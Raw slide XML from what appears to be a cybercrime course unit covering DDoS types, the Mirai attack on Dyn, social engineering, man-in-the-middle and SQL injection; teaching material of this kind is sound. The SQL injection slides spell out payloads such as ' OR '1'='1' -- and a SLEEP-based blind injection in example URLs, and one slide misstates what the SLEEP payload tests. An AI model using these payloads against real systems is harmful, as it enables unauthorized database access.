          <p:cNvPr id="873" name="Google Shape;873;p6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874" name="Google Shape;874;p6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875" name="Google Shape;875;p6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876" name="Google Shape;876;p6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877" name="Google Shape;877;p6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878" name="Google Shape;878;p6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879" name="Google Shape;879;p6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880" name="Google Shape;880;p6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881" name="Google Shape;881;p6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DDoS Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Google Shape;882;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216001" y="1267968"/>
            <a:ext cx="17875228" cy="8508996"/>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200" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Amplification Attacks:</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Exploit services that respond with larger volumes of data than the initial request, amplifying the impact of the attack.</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Examples include DNS amplification and NTP amplification attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="32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1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Volumetric Attacks:</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Flood the target with a high volume of traffic, consuming its available bandwidth.</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Examples include UDP floods and ICMP floods.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="32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1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>TCP Connection Attacks:</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Exploit the limitations of the target's ability to handle new connections.</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Examples include SYN/ACK floods and ACK floods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212121"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Botnet Attacks:</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">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200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Coordinated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>efforts from a network of compromised computers to flood the target.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Example: A botnet of infected computers launching a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> attack on an online service.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883" name="Google Shape;883;p6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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>#2101CS632 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>   UNIT 2 - Attacks &amp; Techniques used in Cyber Crime</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6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889" name="Google Shape;889;p6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890" name="Google Shape;890;p6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891" name="Google Shape;891;p6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892" name="Google Shape;892;p6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893" name="Google Shape;893;p6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894" name="Google Shape;894;p6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895" name="Google Shape;895;p6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896" name="Google Shape;896;p6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Example of DDOS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897" name="Google Shape;897;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650175" y="1267968"/>
            <a:ext cx="15976413" cy="58460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Mirai Botnet Attack (2016):</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Background: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 October 2016, a massive DDoS attack targeted Dyn, a prominent Domain Name System (DNS) service provider. This attack disrupted access to several major websites and online services.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Details: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 Type: DDoS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Objective: Overwhelm and disrupt DNS services, affecting the availability of popular websites and online services.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;p6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6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904" name="Google Shape;904;p6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905" name="Google Shape;905;p6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906" name="Google Shape;906;p6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907" name="Google Shape;907;p6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908" name="Google Shape;908;p6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909" name="Google Shape;909;p6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910" name="Google Shape;910;p6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911" name="Google Shape;911;p6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Example of DDOS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650175" y="1267968"/>
            <a:ext cx="15976413"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How it Happened:</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Mirai Botnet:</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attackers used the Mirai botnet, which primarily consisted of compromised Internet of Things (IoT) devices such as cameras, routers, and DVRs.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Mirai exploited weak or default usernames and passwords to gain unauthorized access to these IoT devices.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Coordinated Attack:</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Mirai-infected devices were orchestrated to flood Dyn's DNS infrastructure with a massive amount of traffic.</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attack was distributed, making it difficult to mitigate because the traffic originated from a large number of geographically dispersed devices.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p6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6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919" name="Google Shape;919;p6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920" name="Google Shape;920;p6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921" name="Google Shape;921;p6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922" name="Google Shape;922;p6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923" name="Google Shape;923;p6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924" name="Google Shape;924;p6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925" name="Google Shape;925;p6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926" name="Google Shape;926;p6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Example of DDOS Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="Google Shape;927;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650175" y="1267968"/>
            <a:ext cx="15976413"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Impact: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Dyn's DNS servers were overwhelmed, leading to widespread disruptions in internet services.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Popular websites and online services, including Twitter, Reddit, GitHub, and others, experienced outages or slow performance.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Consequences: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attack highlighted the vulnerability of IoT devices with weak security measures.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It raised awareness about the potential impact of DDoS attacks on critical internet infrastructure.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Mitigation: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Dyn and other affected companies worked to mitigate the attack by implementing traffic filtering and rerouting strategies.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incident prompted increased efforts to secure IoT devices and raise awareness about the importance of strong device passwords and security measures.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="928" name="Google Shape;928;p6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6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934" name="Google Shape;934;p6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935" name="Google Shape;935;p6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936" name="Google Shape;936;p6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937" name="Google Shape;937;p6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938" name="Google Shape;938;p6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939" name="Google Shape;939;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="12761383" y="2135188"/>
            <a:ext cx="4497917" cy="1214437"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4497917" h="1214437" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4497917" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4497917" y="1214437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1214437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Google Shape;940;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8529371" y="1510506"/>
            <a:ext cx="4340757" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4340757" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4340758" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4340758" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Google Shape;941;p6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942" name="Google Shape;942;p6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943" name="Google Shape;943;p6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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="944" name="Google Shape;944;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="7292788" cy="48745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SQL Injection is a type of cyber attack where an attacker injects malicious SQL code into an application's SQL query. It occurs when an application does not properly validate or sanitize user inputs before constructing SQL queries. The injected SQL code can manipulate the application's database, potentially leading to unauthorized access, data disclosure, or modification.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="945" name="Google Shape;945;p6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6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951" name="Google Shape;951;p6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952" name="Google Shape;952;p6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953" name="Google Shape;953;p6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954" name="Google Shape;954;p6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955" name="Google Shape;955;p6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956" name="Google Shape;956;p6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957" name="Google Shape;957;p6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958" name="Google Shape;958;p6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Key Concepts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Google Shape;959;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="7624191"/>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User Inputs:</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Web applications often take user inputs through forms or URL parameters.</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If these inputs are not properly validated or sanitized, attackers can manipulate them to inject malicious SQL code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="10125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SQL Queries:</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Applications use SQL queries to interact with databases, such as fetching, inserting, updating, or deleting data.</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Injections occur when user inputs are concatenated directly into SQL queries without proper validation.</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Injection Points:</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Common injection points include form fields, URL parameters, or any input that is incorporated into SQL queries without proper validation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="32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Malicious Payloads:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Attackers inject SQL code that alters the intended behavior of the query. This can include extracting data, bypassing authentication, or even modifying the database structure.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="960" name="Google Shape;960;p6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6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966" name="Google Shape;966;p6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967" name="Google Shape;967;p6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968" name="Google Shape;968;p6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969" name="Google Shape;969;p6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970" name="Google Shape;970;p6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971" name="Google Shape;971;p6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972" name="Google Shape;972;p6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973" name="Google Shape;973;p6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974" name="Google Shape;974;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402525" y="1266826"/>
            <a:ext cx="17659950"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CLASSIC SQL INJECTION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 a classic SQL injection scenario, the injection point is typically in the URL parameters, where user input is not properly validated or sanitized before being incorporated into an SQL query.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Example Scenario:</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Consider a website with a URL like the following, where a user can search for products by providing a product ID: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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>https://example.com/products?id=123</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" i="0" u="sng"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application might use this input in an SQL query to retrieve product information from the database. However, if the application does not properly validate or sanitize the user input, it becomes vulnerable to SQL injection.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Vulnerable Query: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Let's say the application uses a query like this to fetch product information:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="975" name="Google Shape;975;p6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6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981" name="Google Shape;981;p6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982" name="Google Shape;982;p6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983" name="Google Shape;983;p6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984" name="Google Shape;984;p6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985" name="Google Shape;985;p6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986" name="Google Shape;986;p6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987" name="Google Shape;987;p6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988" name="Google Shape;988;p6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989" name="Google Shape;989;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="87607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SELECT * FROM products WHERE product_id = 'user_input';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 this query, user_input is the value provided in the id parameter from the URL.</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SQL Injection Payload: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An attacker can exploit this vulnerability by manipulating the input in the URL. If the attacker appends the following payload to the id parameter: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123' OR '1'='1'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resulting URL becomes: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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>https://example.com/products?id=123' OR '1'='1' --</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" i="0" u="sng"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modified query will look like this when the application processes the URL:</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SELECT * FROM products WHERE product_id = '123' OR '1'='1'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990" name="Google Shape;990;p6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7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996" name="Google Shape;996;p7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997" name="Google Shape;997;p7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998" name="Google Shape;998;p7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999" name="Google Shape;999;p7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000" name="Google Shape;1000;p7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001" name="Google Shape;1001;p7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002" name="Google Shape;1002;p7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003" name="Google Shape;1003;p7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1004" name="Google Shape;1004;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950" cy="43887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Explanation of Payload:</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a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>'123': The legitimate product ID.</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a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>OR '1'='1': This condition always evaluates to true, effectively bypassing any authentication or logic that follows.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a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>--: Denotes a comment in SQL, ignoring the rest of the original query.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Expected Output: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modified query will retrieve all records from the products table because the injected condition '1'='1' is always true. The output will include all product information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Google Shape;1005;p7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7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11" name="Google Shape;1011;p7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12" name="Google Shape;1012;p7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13" name="Google Shape;1013;p7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014" name="Google Shape;1014;p7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015" name="Google Shape;1015;p7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016" name="Google Shape;1016;p7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017" name="Google Shape;1017;p7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018" name="Google Shape;1018;p7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1019" name="Google Shape;1019;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412050" y="1257301"/>
            <a:ext cx="17659950"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Time-Based Blind SQL Injection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Time-Based Blind SQL Injection is a type of SQL injection where an attacker infers information from a database by causing time delays in the application's response. This is often used when the attacker cannot directly see the output of the injected SQL query but can determine success or failure based on how long the application takes to respond.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Injection at URL:</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Consider a scenario where a web application has a search functionality that takes a user-provided parameter in the URL to search for products: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sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>URL: https://example.com/search?query=user_input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If the application is vulnerable to Time-Based Blind SQL Injection, an attacker can manipulate the user_input parameter to inject malicious SQL code.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Example Injection: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Let's say the original SQL query behind the scenes looks like this:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Google Shape;1020;p7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69" name="Google Shape;169;p1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70" name="Google Shape;170;p1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71" name="Google Shape;171;p1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72" name="Google Shape;172;p1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73" name="Google Shape;173;p1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74" name="Google Shape;174;p1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75" name="Google Shape;175;p1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76" name="Google Shape;176;p1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ATTACKS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686167" y="1048582"/>
            <a:ext cx="16915665" cy="87607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Social Engineering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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Medium"/>
                <a:ea typeface="Roboto Condensed Medium"/>
                <a:cs typeface="Roboto Condensed Medium"/>
                <a:sym typeface="Roboto Condensed Medium"/>
              </a:rPr>
              <a:t> Manipulates individuals into divulging sensitive information or performing actions.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CEO Fraud or Business Email Compromise (BEC): Attackers impersonate executives to trick employees into transferring funds.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Phishing Calls: Attackers call individuals, posing as legitimate entities to gather sensitive information.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Man-in-the-Middle (MitM)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Definition: Intercepts and potentially alters communication between two parties without their knowledge.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Wi-Fi Eavesdropping: Attackers intercept unencrypted Wi-Fi traffic to capture sensitive information.</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DNS Spoofing: Manipulating DNS responses to redirect users to malicious websites.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178" name="Google Shape;178;p1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24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p7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26" name="Google Shape;1026;p7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27" name="Google Shape;1027;p7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28" name="Google Shape;1028;p7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029" name="Google Shape;1029;p7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030" name="Google Shape;1030;p7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031" name="Google Shape;1031;p7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032" name="Google Shape;1032;p7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033" name="Google Shape;1033;p7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1034" name="Google Shape;1034;p72"/>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SELECT * FROM products WHERE name = 'user_input';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An attacker might inject the following payload to check if the first character of the database name is 'a':</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OR IF(1=1, SLEEP(5), 0)--`</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So, the manipulated URL becomes:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="sng" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>https://example.com/search?query=' OR IF(1=1, SLEEP(5), 0)--' </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600" b="1" i="0" u="sng"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Expected Behavior:</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If the condition IF(1=1, SLEEP(5), 0) is true, the application will introduce a delay of 5 seconds in its response.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If the condition is false, there will be no delay.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By observing the time it takes for the server to respond, the attacker can infer whether the injected condition is true or false.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p7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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
